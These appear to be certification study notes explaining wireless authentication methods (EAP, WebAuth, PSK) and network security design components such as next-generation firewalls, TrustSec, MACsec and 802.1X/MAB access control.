Wireless networks are prone to several security threats, including unauthorized access, rogue APs, denial of service attacks, and other vulnerabilities. Therefore, it is essential to secure the wireless network using appropriate security features. Here are the explanations of EAP, WebAuth, and PSK:
5.4.a EAP (Extensible Authentication Protocol)
EAP (Extensible Authentication Protocol) is an authentication framework that provides several authentication methods, including EAP-FAST, EAP-TLS, and EAP-TTLS, among others. EAP provides a mechanism for authenticating wireless clients and protecting wireless network traffic against eavesdropping and other security threats.
To configure EAP, the network administrator must deploy a public key infrastructure (PKI) to generate digital certificates for each wireless client and APs. The digital certificates provide secure authentication and encryption of wireless traffic.
5.4.b WebAuth (Web Authentication)
WebAuth (Web Authentication) is a security feature that allows guests or clients to connect to the wireless network using a web-based authentication portal. With WebAuth, the guest user or client is required to provide valid credentials, such as a username and password, to gain access to the wireless network.
The WebAuth portal can be customized to display the organization's logo and other branding elements. The portal can also be configured to redirect the guest user to a specific URL upon successful authentication.
5.4.c PSK (Pre-Shared Key)
PSK (Pre-Shared Key) is a wireless security method that uses a shared secret passphrase between the wireless clients and the access point. The passphrase is used to generate an encryption key that is used to encrypt and decrypt wireless traffic.
The network administrator configures the PSK on the access point and shares the passphrase with the authorized wireless clients. PSK is a simple security method that can be used to secure small wireless networks, but it is not scalable and can be easily compromised.
To configure PSK, the network administrator must choose a strong passphrase that is at least 12 characters long and contains a mix of uppercase and lowercase letters, numbers, and special characters. The passphrase should be changed periodically to maintain the wireless network's security.
5.5 Describe the components of network security design
Network security design typically involves several components that work together to protect the network against various threats. Two important components are threat defense and endpoint security.
Threat defense involves identifying and mitigating potential threats to the network, including both internal and external threats. This can include implementing firewalls, intrusion detection and prevention systems, and other security technologies that help to detect and prevent unauthorized access, data exfiltration, and other security incidents.
Endpoint security involves protecting individual devices that are connected to the network, including laptops, desktops, and mobile devices. This can include implementing antivirus and anti-malware software, enforcing strong password policies, and limiting access to sensitive data and systems.
Overall, network security design requires a comprehensive approach that takes into account the unique risks and requirements of the network, as well as the available resources and technologies. By implementing the right security measures and best practices, organizations can help to minimize the risk of security incidents and protect their valuable data and assets.
5.5.c Next-generation firewall
Next-generation firewalls (NGFWs) combine traditional firewall functionality with additional features such as intrusion prevention, application awareness, and deep packet inspection. They provide more granular control over network traffic and can identify and block advanced threats.
5.5.d TrustSec, MACsec
TrustSec is a Cisco technology that provides identity-based network access control (NAC) and policy enforcement. It uses Security Group Tags (SGTs) and Security Group ACLs (SGACLs) to define policies for network access. MACsec is a security protocol that provides encryption for Ethernet traffic at the link layer, protecting against attacks such as man-in-the-middle.
5.5.e Network access control with 802.1X, MAB, and WebAuth
Network access control (NAC) technologies are used to enforce security policies on devices attempting to access a network. 802.1X is an IEEE standard that provides port-based access control using EAP (Extensible Authentication Protocol). MAC Authentication Bypass (MAB) is a method of authenticating devices based on their MAC addresses. WebAuth provides web-based authentication for devices that cannot use 802.1X or MAB, such as guest devices.
